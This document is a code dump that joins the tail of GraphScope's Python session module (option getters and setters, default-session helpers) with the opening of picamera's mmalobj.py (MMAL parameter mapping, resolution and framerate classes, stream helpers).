- k8s_etcd_image
- k8s_image_pull_policy
- k8s_image_pull_secrets
- k8s_coordinator_cpu
- k8s_coordinator_mem
- k8s_vineyard_daemonset
- k8s_vineyard_cpu
- k8s_vineyard_mem
- k8s_engine_cpu
- k8s_engine_mem
- k8s_mars_worker_cpu
- k8s_mars_worker_mem
- k8s_mars_scheduler_cpu
- k8s_mars_scheduler_mem
- with_mars
- enable_gaia
- k8s_volumes
- k8s_waiting_for_delete
- engine_params
- initializing_interactive_engine
- timeout_seconds
Args:
kwargs: dict
kv pair of GraphScope config you want to set.
Raises:
ValueError: If no such option exists.
Returns: None
"""
# check exists
for k, v in kwargs.items():
if not hasattr(gs_config, k):
raise ValueError(f"No such option {k} exists.")
for k, v in kwargs.items():
setattr(gs_config, k, v)
GSLogger.update()
def get_option(key):
"""Get the value of specified option.
Find params detail in :class:`graphscope.Session`
Available options:
- num_workers
- log_level
- show_log
- vineyard_shared_mem
- k8s_namespace
- k8s_service_type
- k8s_gs_image
- k8s_etcd_image
- k8s_image_pull_policy
- k8s_image_pull_secrets
- k8s_coordinator_cpu
- k8s_coordinator_mem
- k8s_vineyard_daemonset
- k8s_vineyard_cpu
- k8s_vineyard_mem
- k8s_engine_cpu
- k8s_engine_mem
- k8s_mars_worker_cpu
- k8s_mars_worker_mem
- k8s_mars_scheduler_cpu
- k8s_mars_scheduler_mem
- with_mars
- enable_gaia
- k8s_volumes
- k8s_waiting_for_delete
- engine_params
- initializing_interactive_engine
- timeout_seconds
Args:
key: str
Key of GraphScope config you want to get.
Raises:
ValueError: If no such option exists.
Returns: result: the value of the option
"""
if hasattr(gs_config, key):
return getattr(gs_config, key)
else:
raise ValueError("No such option {} exists.".format(key))
def default_session(session):
"""Python's :code:`with` handler for defining a default session.
This function provides a means of registering a session for handling
and code that need a default session calls.
The :code:`with` keyword to specify that code invocations within
the scope of a block should be executed by a particular session.
Args:
session: :class:`Session`
The session to be installed as the default session.
Returns:
A context manager for the default session.
"""
return _default_session_stack.get_controller(session)
def get_default_session():
"""Returns the default session for the current context.
Raises:
RuntimeError: Default session is not exist.
Returns:
The default :class:`Session`.
"""
return _default_session_stack.get_default()
def get_session_by_id(handle):
"""Return the session by handle."""
if handle not in _session_dict:
raise ValueError("Session {} not exists.".format(handle))
return _session_dict.get(handle)
class _DefaultSessionStack(object):
"""A stack of objects for providing implicit defaults."""
def __init__(self):
super().__init__()
self.stack = []
def get_default(self):
if not self.stack:
logger.info("Creating default session ...")
sess = session(cluster_type="hosts", num_workers=1)
sess.as_default()
return self.stack[-1]
def reset(self):
self.stack = []
def is_cleared(self):
return not self.stack
@contextlib.contextmanager
def get_controller(self, default):
"""A context manager for manipulating a default stack."""
self.stack.append(default)
try:
yield default
finally:
# stack may be empty if reset() was called
if self.stack:
self.stack.remove(default)
_default_session_stack = _DefaultSessionStack() # pylint: disable=protected-access
def g(incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
"""Construct a GraphScope graph object on the default session.
It will launch and set a session to default when there is no default session found.
See params detail in :class:`graphscope.framework.graph.GraphDAGNode`
Returns:
:class:`graphscope.framework.graph.GraphDAGNode`: Evaluated in eager mode.
Examples:
.. code:: python
>>> import graphscope
>>> g = graphscope.g()
>>> import graphscope
>>> sess = graphscope.session()
>>> sess.as_default()
>>> g = graphscope.g() # creating graph on the session "sess"
"""
return get_default_session().g(incoming_data, oid_type, directed, generate_eid)
def gremlin(graph, engine_params=None):
"""Create a interactive engine and get the handler to execute the gremlin queries.
See params detail in :meth:`graphscope.Session.gremlin`
Returns:
:class:`graphscope.interactive.query.InteractiveQueryDAGNode`:
InteractiveQuery to execute gremlin queries, evaluated in eager mode.
Examples:
.. code:: python
>>> import graphscope
>>> g = graphscope.g()
>>> interactive_query = graphscope.gremlin()
"""
if _default_session_stack.is_cleared():
raise RuntimeError("No default session found.")
return get_default_session().gremlin(graph, engine_params)
def graphlearn(graph, nodes=None, edges=None, gen_labels=None):
"""Create a graph learning engine.
See params detail in :meth:`graphscope.Session.learning`
Returns:
:class:`graphscope.learning.GraphDAGNode`:
An instance of learning graph that could be feed to the learning engine, evaluated in eager node.
Example:
.. code:: python
>>> import graphscope
>>> g = graphscope.g()
>>> lg = graphscope.learning(g)
"""
if _default_session_stack.is_cleared():
raise RuntimeError("No de fault session found.")
return get_default_session().graphlearn(graph, nodes, edges, gen_labels)
|
mmalobj.py | # vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python header conversion
# Copyright (c) 2013-2017 Dave Jones <dave@waveform.org.uk>
#
# Original headers
# Copyright (c) 2012, Broadcom Europe Ltd
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import io
import ctypes as ct
import warnings
import weakref
from threading import Thread, Event
from collections import namedtuple
from fractions import Fraction
from itertools import cycle
from functools import reduce
from operator import mul
from . import bcm_host, mmal
from .streams import BufferIO
from .exc import (
mmal_check,
PiCameraValueError,
PiCameraRuntimeError,
PiCameraMMALError,
PiCameraPortDisabled,
PiCameraDeprecated,
)
# Old firmwares confuse the RGB24 and BGR24 encodings. This flag tracks whether
# the order needs fixing (it is set during MMALCamera.__init__).
FIX_RGB_BGR_ORDER = None
# Mapping of parameters to the C-structure they expect / return. If a parameter
# does not appear in this mapping, it cannot be queried / set with the
# MMALControlPort.params attribute.
PARAM_TYPES = {
mmal.MMAL_PARAMETER_ALGORITHM_CONTROL: mmal.MMAL_PARAMETER_ALGORITHM_CONTROL_T,
mmal.MMAL_PARAMETER_ANNOTATE: None, # adjusted by MMALCamera.annotate_rev
mmal.MMAL_PARAMETER_ANTISHAKE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET: mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET_T,
mmal.MMAL_PARAMETER_AWB_MODE: mmal.MMAL_PARAMETER_AWBMODE_T,
mmal.MMAL_PARAMETER_BRIGHTNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_BUFFER_FLAG_FILTER: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS: mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS_T,
mmal.MMAL_PARAMETER_CAMERA_BURST_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE: mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE_T,
mmal.MMAL_PARAMETER_CAMERA_CONFIG: mmal.MMAL_PARAMETER_CAMERA_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_CUSTOM_SENSOR_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_INFO: None, # adjusted by MMALCameraInfo.info_rev
mmal.MMAL_PARAMETER_CAMERA_INTERFACE: mmal.MMAL_PARAMETER_CAMERA_INTERFACE_T,
mmal.MMAL_PARAMETER_CAMERA_ISP_BLOCK_OVERRIDE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_MIN_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_NUM: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG: mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_RX_TIMING: mmal.MMAL_PARAMETER_CAMERA_RX_TIMING_T,
mmal.MMAL_PARAMETER_CAMERA_SETTINGS: mmal.MMAL_PARAMETER_CAMERA_SETTINGS_T,
mmal.MMAL_PARAMETER_CAMERA_USE_CASE: mmal.MMAL_PARAMETER_CAMERA_USE_CASE_T,
mmal.MMAL_PARAMETER_CAPTURE_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_MODE: mmal.MMAL_PARAMETER_CAPTUREMODE_T,
mmal.MMAL_PARAMETER_CAPTURE_STATS_PASS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_STATUS: mmal.MMAL_PARAMETER_CAPTURE_STATUS_T,
mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST: mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST_T,
mmal.MMAL_PARAMETER_CLOCK_ACTIVE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_ENABLE_BUFFER_INFO: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_LATENCY: mmal.MMAL_PARAMETER_CLOCK_LATENCY_T,
mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_SCALE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_TIME: mmal.MMAL_PARAMETER_INT64_T,
mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD_T,
mmal.MMAL_PARAMETER_COLOUR_EFFECT: mmal.MMAL_PARAMETER_COLOURFX_T,
mmal.MMAL_PARAMETER_CONTRAST: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CORE_STATISTICS: mmal.MMAL_PARAMETER_CORE_STATISTICS_T,
mmal.MMAL_PARAMETER_CUSTOM_AWB_GAINS: mmal.MMAL_PARAMETER_AWB_GAINS_T,
mmal.MMAL_PARAMETER_DISPLAYREGION: mmal.MMAL_DISPLAYREGION_T,
mmal.MMAL_PARAMETER_DPF_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_DYNAMIC_RANGE_COMPRESSION: mmal.MMAL_PARAMETER_DRC_T,
mmal.MMAL_PARAMETER_ENABLE_RAW_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF: mmal.MMAL_PARAMETER_EXIF_T,
mmal.MMAL_PARAMETER_EXP_METERING_MODE: mmal.MMAL_PARAMETER_EXPOSUREMETERINGMODE_T,
mmal.MMAL_PARAMETER_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_EXPOSURE_MODE: mmal.MMAL_PARAMETER_EXPOSUREMODE_T,
mmal.MMAL_PARAMETER_EXTRA_BUFFERS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_FIELD_OF_VIEW: mmal.MMAL_PARAMETER_FIELD_OF_VIEW_T,
mmal.MMAL_PARAMETER_FLASH: mmal.MMAL_PARAMETER_FLASH_T,
mmal.MMAL_PARAMETER_FLASH_REQUIRED: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_FLASH_SELECT: mmal.MMAL_PARAMETER_FLASH_SELECT_T,
mmal.MMAL_PARAMETER_FLICKER_AVOID: mmal.MMAL_PARAMETER_FLICKERAVOID_T,
mmal.MMAL_PARAMETER_FOCUS: mmal.MMAL_PARAMETER_FOCUS_T,
mmal.MMAL_PARAMETER_FOCUS_REGIONS: mmal.MMAL_PARAMETER_FOCUS_REGIONS_T,
mmal.MMAL_PARAMETER_FOCUS_STATUS: mmal.MMAL_PARAMETER_FOCUS_STATUS_T,
mmal.MMAL_PARAMETER_FPS_RANGE: mmal.MMAL_PARAMETER_FPS_RANGE_T,
mmal.MMAL_PARAMETER_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_IMAGE_EFFECT: mmal.MMAL_PARAMETER_IMAGEFX_T,
mmal.MMAL_PARAMETER_IMAGE_EFFECT_PARAMETERS: mmal.MMAL_PARAMETER_IMAGEFX_PARAMETERS_T,
mmal.MMAL_PARAMETER_INPUT_CROP: mmal.MMAL_PARAMETER_INPUT_CROP_T,
mmal.MMAL_PARAMETER_INTRAPERIOD: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_ATTACH_LOG: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_JPEG_Q_FACTOR: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_RESTART_INTERVAL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_LOCKSTEP_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_LOGGING: mmal.MMAL_PARAMETER_LOGGING_T,
mmal.MMAL_PARAMETER_MB_ROWS_PER_SLICE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_MEM_USAGE: mmal.MMAL_PARAMETER_MEM_USAGE_T,
mmal.MMAL_PARAMETER_MINIMISE_FRAGMENTATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_MIRROR: mmal.MMAL_PARAMETER_UINT32_T, # actually mmal.MMAL_PARAMETER_MIRROR_T but this just contains a uint32
mmal.MMAL_PARAMETER_NALUNITFORMAT: mmal.MMAL_PARAMETER_VIDEO_NALUNITFORMAT_T,
mmal.MMAL_PARAMETER_NO_IMAGE_PADDING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_POWERMON_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_PRIVACY_INDICATOR: mmal.MMAL_PARAMETER_PRIVACY_INDICATOR_T,
mmal.MMAL_PARAMETER_PROFILE: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_RATECONTROL: mmal.MMAL_PARAMETER_VIDEO_RATECONTROL_T,
mmal.MMAL_PARAMETER_REDEYE: mmal.MMAL_PARAMETER_REDEYE_T,
mmal.MMAL_PARAMETER_ROTATION: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_SATURATION: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SEEK: mmal.MMAL_PARAMETER_SEEK_T,
mmal.MMAL_PARAMETER_SENSOR_INFORMATION: mmal.MMAL_PARAMETER_SENSOR_INFORMATION_T,
mmal.MMAL_PARAMETER_SHARPNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SHUTTER_SPEED: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_STATISTICS: mmal.MMAL_PARAMETER_STATISTICS_T,
mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE: mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE_T,
mmal.MMAL_PARAMETER_STILLS_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS: mmal.MMAL_PARAMETER_ENCODING_T,
mmal.MMAL_PARAMETER_SUPPORTED_PROFILES: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_SW_SATURATION_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SW_SHARPEN_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SYSTEM_TIME: mmal.MMAL_PARAMETER_UINT64_T,
mmal.MMAL_PARAMETER_THUMBNAIL_CONFIGURATION: mmal.MMAL_PARAMETER_THUMBNAIL_CONFIG_T,
mmal.MMAL_PARAMETER_URI: mmal.MMAL_PARAMETER_URI_T,
mmal.MMAL_PARAMETER_USE_STC: mmal.MMAL_PARAMETER_CAMERA_STC_MODE_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_HORIZ: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_VERT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_BIT_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_DROPPABLE_PFRAMES: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE: mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE: mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_FRAME_LIMIT_BITS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INITIAL_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_HEADER: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_VECTORS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MAX_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MIN_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_PEAK_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_QP_P: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL: mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_SLICE_DQUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SEI_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SPS_TIMING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_VIDEO_IMMUTABLE_INPUT: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE: mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE_T,
mmal.MMAL_PARAMETER_VIDEO_INTERPOLATE_TIMESTAMPS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH: mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH_T,
mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION: mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION_T,
mmal.MMAL_PARAMETER_VIDEO_MAX_NUM_CALLBACKS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS: mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS_T,
mmal.MMAL_PARAMETER_VIDEO_REQUEST_I_FRAME: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_STABILISATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_COPY: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_SHUTTER_LAG: mmal.MMAL_PARAMETER_ZEROSHUTTERLAG_T,
mmal.MMAL_PARAMETER_ZOOM: mmal.MMAL_PARAMETER_SCALEFACTOR_T,
mmal.MMAL_PARAMETER_DRAW_BOX_FACES_AND_FOCUS: mmal.MMAL_PARAMETER_BOOLEAN_T,
}
class PiCameraFraction(Fraction):
"""
Extends :class:`~fractions.Fraction` to act as a (numerator, denominator)
tuple when required.
"""
def __len__(self):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
return 2
def __getitem__(self, index):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
if index == 0:
return self.numerator
elif index == 1:
return self.denominator
else:
raise IndexError('invalid index %d' % index)
def __contains__(self, value):
return value in (self.numerator, self.denominator)
class PiResolution(namedtuple('PiResolution', ('width', 'height'))):
"""
A :func:`~collections.namedtuple` derivative which represents a resolution
with a :attr:`width` and :attr:`height`.
.. attribute:: width
The width of the resolution in pixels
.. attribute:: height
The height of the resolution in pixels
.. versionadded:: 1.11
"""
__slots__ = () # workaround python issue #24931
def pad(self, width=32, height=16):
"""
Returns the resolution padded up to the nearest multiple of *width*
and *height* which default to 32 and 16 respectively (the camera's
native block size for most operations). For example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).pad()
PiResolution(width=1920, height=1088)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=128, height=112)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=112, height=112)
"""
return PiResolution(
width=((self.width + (width - 1)) // width) * width,
height=((self.height + (height - 1)) // height) * height,
)
def transpose(self):
"""
Returns the resolution with the width and height transposed. For
example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).transpose()
PiResolution(width=1080, height=1920)
"""
return PiResolution(self.height, self.width)
def __str__(self):
return '%dx%d' % (self.width, self.height)
class PiFramerateRange(namedtuple('PiFramerateRange', ('low', 'high'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the low and high limits of a range of framerates. It is recommended that
you access the information stored by this class by attribute rather than
position (for example: ``camera.framerate_range.low`` rather than
``camera.framerate_range[0]``).
.. attribute:: low
The lowest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. attribute:: high
The highest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. versionadded:: 1.13
"""
__slots__ = () # workaround python issue #24931
def __new__(cls, low, high):
return super(PiFramerateRange, cls).__new__(cls, to_fraction(low),
to_fraction(high))
def __str__(self):
return '%s..%s' % (self.low, self.high)
class PiSensorMode(namedtuple('PiSensorMode', ('resolution', 'framerates',
'video', 'still', 'full_fov'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the attributes describing a camera sensor mode.
.. attribute:: resolution
A :class:`PiResolution` specifying the size of frames output by the
camera in this mode.
.. attribute:: framerates
A :class:`PiFramerateRange` specifying the minimum and maximum
framerates supported by this sensor mode. Typically the low value is
exclusive and high value inclusive.
.. attribute:: video
A :class:`bool` indicating whether or not the mode is capable of
recording video. Currently this is always ``True``.
.. attribute:: still
A :class:`bool` indicating whether the mode can be used for still
captures (cases where a capture method is called with
``use_video_port`` set to ``False``).
.. attribute:: full_fov
A :class:`bool` indicating whether the full width of the sensor
area is used to capture frames. This can be ``True`` even when the
resolution is less than the camera's maximum resolution due to binning
and skipping. See :ref:`camera_modes` for a diagram of the available
fields of view.
"""
__slots__ = () # workaround python issue #24931
def __new__(cls, resolution, framerates, video=True, still=False,
full_fov=True):
return super(PiSensorMode, cls).__new__(
cls,
resolution
if isinstance(resolution, PiResolution) else
to_resolution(resolution),
framerates
if isinstance(framerates, PiFramerateRange) else
PiFramerateRange(*framerates),
video, still, full_fov)
def open_stream(stream, output=True, buffering=65536):
"""
This is the core of picamera's IO-semantics. It returns a tuple of a
file-like object and a bool indicating whether the stream requires closing
once the caller is finished with it.
* If *stream* is a string, it is opened as a file object (with mode 'wb' if
*output* is ``True``, and the specified amount of *bufffering*). In this
case the function returns ``(stream, True)``.
* If *stream* is a stream with a ``write`` method, it is returned as
``(stream, False)``.
* Otherwise *stream* is assumed to be a writeable buffer and is wrapped
with :class:`BufferIO`. The function returns ``(stream, True)``.
"""
if isinstance(stream, bytes):
stream = stream.decode('ascii')
opened = isinstance(stream, str)
if opened:
stream = io.open(stream, 'wb' if output else 'rb', buffering)
else:
try:
if output:
stream.write
else:
stream.read
except AttributeError:
# Assume the stream is actually a buffer
opened = True
stream = BufferIO(stream)
if output and not stream.writable:
raise IOError('writeable buffer required for output')
return (stream, opened)
def close_stream(stream, opened):
"""
If *opened* is ``True``, then the ``close`` method of *stream* will be
called. Otherwise, the function will attempt to call the ``flush`` method
on *stream* (if one exists). This function essentially takes the output
of :func:`open_stream` and finalizes the result.
"""
if opened:
stream.close()
else:
try:
stream.flush()
except AttributeError:
pass
def to_resolution(value):
"""
Converts *value* which may be a (width, height) tuple or a string
containing a representation of a resolution (e.g. "1024x768" or "1080p") to
a (width, height) tuple.
"""
if isinstance(value, bytes):
value = value.decode('utf-8')
if isinstance(value, str):
try:
# A selection from https://en.wikipedia.org/wiki/Graphics_display_resolution
# Feel free to suggest additions
w, h = {
'VGA': (640, 480),
'SVGA': (800, 600),
'XGA': (1024, 768),
'SXGA': (1280, 1024),
'UXGA': (1600, 1200),
'HD': (1280, 720),
'FHD': (1920, 1080),
'1080P': (1920, 1080),
'720P': (1280, 720),
}[value.strip().upper()]
except KeyError:
w, h = (int(i.strip()) for i in value.upper().split('X', 1))
else:
try:
w, h = value
except (TypeError, ValueError):
raise PiCameraValueError("Invalid resolution tuple: %r" % value)
return PiResolution(w, h)
def to_fraction(value, den_limit=65536):
"""
Converts *value*, which can be any numeric type, an MMAL_RATIONAL_T, or a
(numerator, denominator) tuple to a :class:`~fractions.Fraction` limiting
the denominator to the range 0 < n <= *den_limit* (which defaults to
65536).
"""
try:
# int, long, or fraction
n, d = value.numerator, value.denominator
except AttributeError:
try:
# float
n, d = value.as_integer_ratio()
except AttributeError:
try:
n, d = value.num, value.den
except AttributeError:
try:
# tuple
n, d = value
warnings.warn(
PiCameraDeprecated(
"Setting framerate or gains as a tuple is "
"deprecated; please use one of Python's many "
"numeric classes like int, float, Decimal, or "
"Fraction instead"))
except (TypeError, ValueError):
# try and convert anything else to a Fraction directly
value = Fraction(value)
n, d = value.numerator, value.denominator
# Ensure denominator is reasonable
if d == 0:
raise PiCameraValueError("Denominator cannot be 0")
elif d > den_limit:
return Fraction(n, d).limit_denominator(den_limit)
else:
return Fraction(n, d)
def to_rational(value):
"""
Converts *value* (which can be anything accepted by :func:`to_fraction`) to
an MMAL_RATIONAL_T structure.
"""
value = to_fraction(value)
return mmal.MMAL_RATIONAL_T(value.numerator, value.denominator)
def buffer_bytes(buf):
"""
Given an object which implements the :ref:`buffer protocol
<bufferobjects>`, this function returns the size of the object in bytes.
The object can be multi-dimensional or include items larger than byte-size.
"""
if not isinstance(buf, memoryview):
buf = memoryview(buf)
return buf.itemsize * reduce(mul, buf.shape)
def debug_pipeline(port):
"""
Given an :class:`MMALVideoPort` *port*, this traces all objects in the
pipeline feeding it (including components and connections) and yields each
object in turn. Hence the generator typically yields something like:
* :class:`MMALVideoPort` (the specified output port)
* :class:`MMALEncoder` (the encoder which owns the output port)
* :class:`MMALVideoPort` (the encoder's input port)
* :class:`MMALConnection` (the connection between the splitter and encoder)
* :class:`MMALVideoPort` (the splitter's output port)
